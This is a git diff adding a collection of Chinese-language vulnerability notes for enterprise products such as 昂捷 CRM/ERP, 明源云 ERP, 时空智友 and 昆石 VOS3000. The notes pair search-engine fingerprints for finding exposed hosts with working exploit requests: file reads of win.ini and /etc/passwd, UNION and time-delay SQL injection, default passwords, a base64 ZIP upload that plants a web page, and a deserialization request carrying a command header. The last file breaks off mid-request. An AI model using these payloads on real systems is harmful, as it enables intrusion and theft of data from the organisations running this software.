diff --git a/时空智友企业流程化管控系统manage敏感信息泄露漏洞.md b/时空智友企业流程化管控系统manage敏感信息泄露漏洞.md
new file mode 100644
index 0000000..36e4271
--- /dev/null
+++ b/时空智友企业流程化管控系统manage敏感信息泄露漏洞.md
@@ -0,0 +1,25 @@
+# 时空智友企业流程化管控系统manage敏感信息泄露漏洞
+
+# 一、漏洞简介
+时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化，从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统敏感信息泄露,攻击者可通过此漏洞获取敏感信息。
+
+# 二、影响版本
++ 时空智友企业流程化管控系统
+
+# 三、资产测绘
++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"`
++ 登录页面
+
+![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/rxKtzkM-r8wfTNx6/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-099545.png)
+
+# 四、漏洞复现
+```plain
+/manage/index.jsp
+```
+
+![1700037663571-3c18c7c2-ca30-4334-9668-8676d65805b1.png](./img/rxKtzkM-r8wfTNx6/1700037663571-3c18c7c2-ca30-4334-9668-8676d65805b1-103789.png)
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kypwe3tltt5kt5ud>
\ No newline at end of file
diff --git a/时空智友企业流程化管控系统wc.db文件信息泄露漏洞.md b/时空智友企业流程化管控系统wc.db文件信息泄露漏洞.md
new file mode 100644
index 0000000..64a996c
--- /dev/null
+++ b/时空智友企业流程化管控系统wc.db文件信息泄露漏洞.md
@@ -0,0 +1,27 @@
+# 时空智友企业流程化管控系统 wc.db 文件信息泄露漏洞
+
+# 一、漏洞简介
+时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化，从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统wc.db 信息泄露漏洞，攻击者可利用该漏洞获取系统的敏感信息等。
+
+# 二、影响版本
++ 时空智友企业流程化管控系统
+
+# 三、资产测绘
++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"`
++ 登录页面
+
+![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/3z7RiAKSWsW-y6Hd/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-562783.png)
+
+# 四、漏洞复现
+```plain
+/.svn/wc.db
+```
+
+![1700037972185-dc8d2b6d-f3aa-4354-8353-465fdc8c6843.png](./img/3z7RiAKSWsW-y6Hd/1700037972185-dc8d2b6d-f3aa-4354-8353-465fdc8c6843-909643.png)
+
+![1700037948655-5e46987b-654c-4b4c-871d-4cc9ea516a3b.png](./img/3z7RiAKSWsW-y6Hd/1700037948655-5e46987b-654c-4b4c-871d-4cc9ea516a3b-312136.png)
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/igpfbscu4lzfazkv>
\ No newline at end of file
diff --git a/时空物流运输管理系统存在敏感信息泄露漏洞.md b/时空物流运输管理系统存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..b1bb7fa
--- /dev/null
+++ b/时空物流运输管理系统存在敏感信息泄露漏洞.md
@@ -0,0 +1,17 @@
+# 时空物流运输管理系统存在敏感信息泄露漏洞
+时空物流运输管理系统存在敏感信息泄露漏洞
+
+## fofa
+```rust
+body="/Images/ManLogin/name.png"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735477340408-41d21d71-9f58-4612-8ef5-4a91da7874c7.png)
+
+## poc
+```rust
+/ManLogin/SysData
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735477463215-4ec0d8fe-e862-4f71-b56e-67159ca9c1e3.png)
+
diff --git a/时间精细化管理平台存在弱口令漏洞.md b/时间精细化管理平台存在弱口令漏洞.md
new file mode 100644
index 0000000..6e0c6f4
--- /dev/null
+++ b/时间精细化管理平台存在弱口令漏洞.md
@@ -0,0 +1,24 @@
+# 时间精细化管理平台存在弱口令漏洞
+
+# 一、漏洞简介
+时间精细化管理平台存在弱口令漏洞，攻击者可通过该漏洞获取应用系统管理员权限。
+
+# 二、影响版本
++ 时间精细化管理平台
+
+# 三、资产测绘
++ hunter`web.body="/iclock/accounts/login/"`
++ 特征
+
+![1701768019740-2dc4a787-7f61-4957-852f-e0587bbe36cc.png](./img/j-xB77lRB68YH5-q/1701768019740-2dc4a787-7f61-4957-852f-e0587bbe36cc-705595.png)
+
+# 四、漏洞复现
++ 弱口令
++ admin/123456、admin/111111
+
+![1701768055250-594cedfb-7d30-40a7-b49e-5e352cfab407.png](./img/j-xB77lRB68YH5-q/1701768055250-594cedfb-7d30-40a7-b49e-5e352cfab407-222086.png)
+
+
+
+> 更新: 2024-02-29 23:55:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sow2lq5kwq7g9n9x>
\ No newline at end of file
diff --git a/昂捷CRMcwsfiledown存在任意文件读取漏洞.md b/昂捷CRMcwsfiledown存在任意文件读取漏洞.md
new file mode 100644
index 0000000..ba39b9b
--- /dev/null
+++ b/昂捷CRMcwsfiledown存在任意文件读取漏洞.md
@@ -0,0 +1,43 @@
+# 昂捷CRM cwsfiledown存在任意文件读取漏洞
+
+# 一、漏洞简介
+昂捷CRM (Customer Relationship Management) 是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度，从而推动业务增长，该系统集成了客户信息管理、会员营销、客户服务等多个功能模块，为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsfiledown存在任意文件读取漏洞
+
+# 二、影响版本
+```plain
+昂捷CRM 
+```
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ fofa`body="/ClientBin/slEnjoy.App.xap"`
++ 特征
+
+![1732852842698-06314946-c4c6-4d0b-9bae-51ed78196135.png](./img/_tSJqR4iociFGCpX/1732852842698-06314946-c4c6-4d0b-9bae-51ed78196135-940796.png)
+
+# 四、漏洞复现
+```plain
+POST /EnjoyRMIS_WS/WS/FileDown/cwsfiledown.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/DownFileBytes"
+ 
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <DownFileBytes xmlns="http://tempuri.org/">
+      <sFileName>c://windows//win.ini</sFileName>
+      <iPosition>1</iPosition>
+      <iReadBytesLen>100</iReadBytesLen>
+      <bReadBytes>ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg</bReadBytes>
+    </DownFileBytes>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1732852903103-dc8fee22-2072-4144-87f5-54115f4c75e2.png](./img/_tSJqR4iociFGCpX/1732852903103-dc8fee22-2072-4144-87f5-54115f4c75e2-049077.png)
+
+
+
+> 更新: 2024-12-20 14:53:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ucrqld04f4zvnq32>
\ No newline at end of file
diff --git a/昂捷CRMcwsuploadpicture存在任意文件读取漏洞.md b/昂捷CRMcwsuploadpicture存在任意文件读取漏洞.md
new file mode 100644
index 0000000..a274425
--- /dev/null
+++ b/昂捷CRMcwsuploadpicture存在任意文件读取漏洞.md
@@ -0,0 +1,39 @@
+# 昂捷CRM cwsuploadpicture存在任意文件读取漏洞
+
+# 一、漏洞简介
+昂捷CRM (Customer Relationship Management) 是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度，从而推动业务增长，该系统集成了客户信息管理、会员营销、客户服务等多个功能模块，为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsuploadpicture存在任意文件读取漏洞
+
+# 二、影响版本
+```plain
+昂捷CRM 
+```
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ fofa`body="/ClientBin/slEnjoy.App.xap"`
++ 特征
+
+![1732852842698-06314946-c4c6-4d0b-9bae-51ed78196135.png](./img/RiIKMjX_0E9dc_82/1732852842698-06314946-c4c6-4d0b-9bae-51ed78196135-997434.png)
+
+# 四、漏洞复现
+```plain
+POST /enjoyRMIS_WS/WS/Common/cwsuploadpicture.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+SOAPAction: "http://tempuri.org/GetPicture"
+ 
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetPicture xmlns="http://tempuri.org/">
+      <sFullFileName>c:/windows/win.ini</sFullFileName>
+    </GetPicture>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1734600358846-57a27a23-cf9a-4b3b-8507-945c7b3d6841.png](./img/RiIKMjX_0E9dc_82/1734600358846-57a27a23-cf9a-4b3b-8507-945c7b3d6841-315491.png)
+
+
+
+> 更新: 2024-12-20 14:53:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kyistvq4bcnt1rdb>
\ No newline at end of file
diff --git a/昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞.md b/昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞.md
new file mode 100644
index 0000000..cf775bb
--- /dev/null
+++ b/昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞
+
+昂捷CRM（Customer Relationship Management）是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度，从而推动业务增长。该系统集成了客户信息管理、会员营销、客户服务等多个功能模块，为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsfiledown.asmx 接口DownFileBytes实例处存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件
+
+## fofa
+
+```javascript
+body="/ClientBin/slEnjoy.App.xap"
+```
+
+## poc
+
+```xml
+POST /EnjoyRMIS_WS/WS/FileDown/cwsfiledown.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/DownFileBytes"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <DownFileBytes xmlns="http://tempuri.org/">
+      <sFileName>c://windows//win.ini</sFileName>
+      <iPosition>1</iPosition>
+      <iReadBytesLen>100</iReadBytesLen>
+      <bReadBytes>ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg</bReadBytes>
+    </DownFileBytes>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20241128094832675](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280948742.png)
\ No newline at end of file
diff --git a/昂捷CRM系统cwsuploadpicture.asmx任意文件读取漏洞.md b/昂捷CRM系统cwsuploadpicture.asmx任意文件读取漏洞.md
new file mode 100644
index 0000000..6af084b
--- /dev/null
+++ b/昂捷CRM系统cwsuploadpicture.asmx任意文件读取漏洞.md
@@ -0,0 +1,29 @@
+# 昂捷CRM系统cwsuploadpicture.asmx任意文件读取漏洞
+
+昂捷CRM（Customer Relationship Management）是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度，从而推动业务增长。该系统集成了客户信息管理、会员营销、客户服务等多个功能模块，为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsuploadpicture.asmx接口处存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件
+
+## fofa
+
+```javascript
+body="/ClientBin/slEnjoy.App.xap"
+```
+
+## poc
+
+```xml
+POST /enjoyRMIS_WS/WS/Common/cwsuploadpicture.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+SOAPAction: "http://tempuri.org/GetPicture"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetPicture xmlns="http://tempuri.org/">
+      <sFullFileName>c:/windows/win.ini</sFullFileName>
+    </GetPicture>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20241219151849207](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191518273.png)
\ No newline at end of file
diff --git a/昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071).md b/昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071).md
new file mode 100644
index 0000000..cd9ed16
--- /dev/null
+++ b/昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071).md
@@ -0,0 +1,56 @@
+## 昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071)
+ 昂捷ERP WebService接口 存在SQL注入漏洞，未经身份验证的攻击者可以利用该漏洞泄露系统敏感信息。 
+
+## fofa
+```
+body="CheckSilverlightInstalled"
+```
+
+## hunter
+```
+web.body="CheckSilverlightInstalled"
+```
+
+## SQL注入点1 /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx
+```
+POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
+Host: xxx.xxx.xxx.xxx:8008
+Content-Type: text/xml; 
+charset=utf-8
+Content-Length: 482
+
+SOAPAction: "http://tempuri.org/GetOSpById"
+<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj</sId></GetOSpById></soap:Body></soap:Envelope>
+```
+
+##  SQL注入点2 /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx
+```
+POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1
+Host: xxx.xxx.xxx.xxx:8008
+Content-Type: text/xml; 
+charset=utf-8
+Content-Length: 482
+
+SOAPAction: "http://tempuri.org/GetOSpById"
+<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj</sId></GetOSpById></soap:Body></soap:Envelope>
+```
+
+## 漏洞复现
+访问漏洞点存在的地址
+
+http://xxx.xxx.xxx.xxx:9012/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx
+
+在地址后面加上?wsdl
+
+http://xxx.xxx.xxx.xxx:8123/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx?wsdl
+
+![image](https://github.com/wy876/POC/assets/139549762/a0b95351-845e-49c5-ba1e-8831cf85df9e)
+
+使用wsdler拓展工具解析
+
+![image](https://github.com/wy876/POC/assets/139549762/0537ac47-e89a-41fa-b925-cca83fba75ae)
+
+解析完成之后，即可对这些接口进行测试
+
+![image](https://github.com/wy876/POC/assets/139549762/c1206032-8405-40e4-8ab4-69a68ee22d7f)
+
diff --git a/昆石网络VOS3000任意文件读取漏洞.md b/昆石网络VOS3000任意文件读取漏洞.md
new file mode 100644
index 0000000..e4177be
--- /dev/null
+++ b/昆石网络VOS3000任意文件读取漏洞.md
@@ -0,0 +1,25 @@
+# 昆石网络VOS3000任意文件读取漏洞
+
+# 一、漏洞简介
+昆石网络VOS3000是一款功能全面、性能稳定的VoIP运营支撑系统，适用于各类 电信级 运营业务，尤其适合中小规模VoIP运营业务的需求。无论是在云服务器还是物理机上，它都能完美运行，为运营商提供高效、稳定、可靠的电信级运营服务。昆石网络VOS3000任意文件读取，攻击者可通过此漏洞获取敏感信息。
+
+# 二、影响版本
++ 昆石网络VOS3000
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(199, 37, 78);">body="VOS3000, VoIP, VoIP运营支撑系统, 软交换"</font>`
++ 特征
+
+![1717167745472-1ad070b4-b932-41cf-ba11-bdad2f18a712.png](./img/NU8GNq2UNNv4VWQF/1717167745472-1ad070b4-b932-41cf-ba11-bdad2f18a712-105863.png)
+
+# 四、漏洞复现
+```rust
+/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
+```
+
+![1717167837710-837017ab-620b-46fe-aaec-fdf3664c4680.png](./img/NU8GNq2UNNv4VWQF/1717167837710-837017ab-620b-46fe-aaec-fdf3664c4680-357508.png)
+
+
+
+> 更新: 2024-06-01 11:14:22  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qnkhfqg0258ep6b5>
\ No newline at end of file
diff --git a/明源云ERP接口VisitorWeb_XMLHTTP.aspx存在SQL注入漏洞.md b/明源云ERP接口VisitorWeb_XMLHTTP.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..b30e73b
--- /dev/null
+++ b/明源云ERP接口VisitorWeb_XMLHTTP.aspx存在SQL注入漏洞.md
@@ -0,0 +1,39 @@
+# 明源云ERP接口VisitorWeb_XMLHTTP.aspx存在SQL注入漏洞
+
+明源云ERP是一款专门为房地产行业设计的企业资源计划（ERP）系统。它旨在帮助房地产公司更有效地管理其业务流程，从项目开发到销售，再到售后服务。该系统集成了财务管理、项目管理、合同管理、采购管理、销售管理等多个模块，提供端到端的解决方案。该系统某接口存在SQL注入漏洞，该漏洞可以直接执行SQL语句并且回显到数据包中。
+
+## Hunter
+
+```javascript
+app.name="明源云 ERP"
+```
+
+## poc
+
+```javascript
+GET /CgZtbWeb/VisitorWeb/VisitorWeb_XMLHTTP.aspx?ywtype=GetParentProjectName&ParentCode=1%27+union+select+sum(3233*3323)--+z HTTP/1.1
+Host: 192.168.10.2:9061
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Priority: u=0, i
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411071134231.webp)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/XmuRwFH1c3uE4bgb73QKsQ
\ No newline at end of file
diff --git a/明源云ERP系统接口管家ApiUpdate.ashx文件存在任意文件上传漏洞.md b/明源云ERP系统接口管家ApiUpdate.ashx文件存在任意文件上传漏洞.md
new file mode 100644
index 0000000..8533247
--- /dev/null
+++ b/明源云ERP系统接口管家ApiUpdate.ashx文件存在任意文件上传漏洞.md
@@ -0,0 +1,43 @@
+# 明源云ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞
+
+# 一、漏洞简介
+明源云ERP系统是一个云端部署的ERP系统，具有高效、灵活和可定制的特点。它支持多种自定义功能，包括表单、报表、流程等，企业可以根据自身业务需求进行个性化定制，提高管理效率与操作便捷性。同时，该系统提供丰富的移动端应用，员工可以随时随地进行业务操作、数据查询与报表分析，实现高效协同，提高企业运营效率。此外，明源云ERP系统还具有精确的财务数据管理功能，通过集成各个财务子模块，实现财务数据的自动收集、整理和汇总，并自动生成准确的财务报表。总之，明源云ERP系统是一个高效、灵活、可定制的ERP系统，可以满足企业的个性化需求，并实现高效协同和精确的财务数据管理。明源云ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞，攻击者通过构造特殊的ZIP压缩包可以上传任意文件，控制服务器。
+
+# 二、影响版本
++ 明源云ERP系统接口管家
+
+# 三、资产测绘
++ fofa`(body="hibot.js" || title="明源云ERP")`
++ 特征
+
+![1705156735709-3c67057a-1062-4d33-ae3f-c47d2ecec7b8.png](./img/BzjSaX8PT1v6Uhqf/1705156735709-3c67057a-1062-4d33-ae3f-c47d2ecec7b8-848761.png)
+
+# 四、漏洞复现
+```http
+POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 
+
+{{base64_decode("UEsDBBQAAAAIAPKaC1eX6YtyjAAAAJMAAAAeAAAALi4vLi4vLi4vZmRjY2xvdWQvXy9jaGVjay5hc3B4JMzLCsIwFATQXwmRQrsJCt1IqyiKUPBRWsT1bRhqIWliHoJ/b8TdMGeYOtuxlkawM81jTGHDDwvOsm2doNHWuMCupOEtyWT9xwdo0dz+E9YlMLOHeLgpIOdSlstyNax5UZ0mBXGEQup7uDecuJBtKTzzDq8IH8TdKbEfvFEx4AdFUaXbLwAAAP//AwBQSwECFAMUAAAACADymgtXl+mLcowAAACTAAAAHgAAAAAAAAAAAAAAAAAAAAAALi4vLi4vLi4vZmRjY2xvdWQvXy9jaGVjay5hc3B4UEsFBgAAAAABAAEATAAAAMgAAAAAAA==")}}
+```
+
+![1705156776315-0a29ef7c-c666-4373-934e-151a99603e60.png](./img/BzjSaX8PT1v6Uhqf/1705156776315-0a29ef7c-c666-4373-934e-151a99603e60-447163.png)
+
+上传文件位置
+
+```http
+/fdccloud/_/check.aspx
+```
+
+![1705156800899-0428c6e3-5187-49bc-b37b-52efb3f6a0bd.png](./img/BzjSaX8PT1v6Uhqf/1705156800899-0428c6e3-5187-49bc-b37b-52efb3f6a0bd-526784.png)
+
+[Mosaic-crypt-tools-1.5-SNAPSHOT-jar-with-dependencies.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222141911-beeed224-b25e-4b46-a48c-afe3ed72af43.jar)
+
+![1705156847091-4e04f815-6782-4825-9a31-03bd550bb8e2.png](./img/BzjSaX8PT1v6Uhqf/1705156847091-4e04f815-6782-4825-9a31-03bd550bb8e2-864612.png)
+
+![1705156862381-a0bb1008-1a00-4eed-b5ae-0e91d0dbbb0b.png](./img/BzjSaX8PT1v6Uhqf/1705156862381-a0bb1008-1a00-4eed-b5ae-0e91d0dbbb0b-735826.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wlaowua3lmsbig8l>
\ No newline at end of file
diff --git a/明源云GetErpConfig.aspx信息泄露漏洞.md b/明源云GetErpConfig.aspx信息泄露漏洞.md
new file mode 100644
index 0000000..6c9edef
--- /dev/null
+++ b/明源云GetErpConfig.aspx信息泄露漏洞.md
@@ -0,0 +1,22 @@
+# 明源云GetErpConfig.aspx信息泄露漏洞
+
+明源云ERP报表服务 GetErpConfig.aspx 接口存在信息泄露漏洞，未经身份验证的远程攻击者可利用此漏洞获取内部数据库敏感配置信息，导致系统处于极不安全的状态。
+
+## fofa
+
+```javascript
+body="报表服务已正常运行"
+```
+
+## poc
+
+```javascript
+GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
diff --git a/明源地产ERP接口Service.asmx存在SQL注入漏洞.md b/明源地产ERP接口Service.asmx存在SQL注入漏洞.md
new file mode 100644
index 0000000..0d66afe
--- /dev/null
+++ b/明源地产ERP接口Service.asmx存在SQL注入漏洞.md
@@ -0,0 +1,40 @@
+#  明源地产ERP接口Service.asmx存在SQL注入漏洞  
+某源地产ERP是一款专门为房地产行业设计的企业资源规划（ERP）系统，旨在帮助房地产企业实现全面的信息化管理，提高运营效率和管理水平。系统涵盖了项目管理、财务管理、供应链管理、客户关系管理（CRM）、人力资源管理等多个核心功能模块，通过整合企业的各个业务环节，实现信息的统一管理和高效协同。该系统在房地产行业具有高度的专业性和适用性，能够满足不同规模和类型企业的需求。适用于各种规模和类型的房地产企业，特别是需要进行项目管理和资金管理的企业。无论是大型企业还是中小企业，都可以从某源地产ERP系统中受益。例如，大型企业可以利用系统的全面性和集成性，实现复杂的业务流程管理和数据分析；而中小企业则可以根据自身需求，选择适合的功能模块，优化资源配置，提高运营效率。  
+
+## fofa
+
+```javascript
+body="/_common/scripts/md5-min.js"
+```
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qQQRNkEo8NMwRQ021eRZBqBuKH0CuQ7uEILDKfLck9mxaJjR8m82DzflBlIciaUThm2oe1chjiaaSg/640?wx_fmt=png&from=appmsg "")  
+
+## poc
+
+```javascript
+POST /Kfxt/Service.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+X-Forwarded-For: 127.0.0.1');WAITFOR DELAY '0:0:4'--
+SOAPAction: "http://www.mysoft.com.cn/queryProjects"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <queryProjects xmlns="http://www.mysoft.com.cn/">
+      <inpXML>&lt;xml&gt;&lt;buname&gt;abc&lt;/buname&gt;&lt;/xml&gt;</inpXML>
+    </queryProjects>
+  </soap:Body>
+</soap:Envelope>
+```
+
+延时  
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qQQRNkEo8NMwRQ021eRZBqtia5diaMouyFgIhPoUNLYEOxj9HXAjYV7XWuHACmMwG3xCQHvAczsGHQ/640?wx_fmt=png&from=appmsg "")  
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/iUv6iV71vh_6uBLZpyJX0Q
diff --git a/明源地产ERP系统WFWebService存在反序列化漏洞.md b/明源地产ERP系统WFWebService存在反序列化漏洞.md
new file mode 100644
index 0000000..a682dd6
--- /dev/null
+++ b/明源地产ERP系统WFWebService存在反序列化漏洞.md
@@ -0,0 +1,31 @@
+# 明源地产ERP系统WFWebService存在反序列化漏洞
+明源地产ERP是一款专为房地产行业设计的企业资源规划(ERP) 系统，系统集成了项目管理、财务管理、客户关系管理、营销管理等个模块，旨在帮助房地产企业提升运营效率、降低成本和提高客户满意度。它充分考虑了房地产行业的特性和需求，通过整合企业的各业务环节，实现信息的统一管理和高效协同。明源地产ERP WFWebService存在反序列化漏洞。
+
+# fofa
+```javascript
+title="明源地产ERP"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730709603041-118d9f58-24d3-4e87-9fcc-4374ef9bc861.png)
+
+## poc
+```javascript
+POST /MyWorkflowManagement/WebService/WFWebService.asmx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
+Content-Type: text/xml; charset=utf-8
+SOAPAction: "http://tempuri.org/WriteLog"
+cmd: dir
+ 
+<?xml version="1.0" encoding="utf-8"?>
+  <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+    <soap:Body>
+      <WriteLog xmlns="http://tempuri.org/">
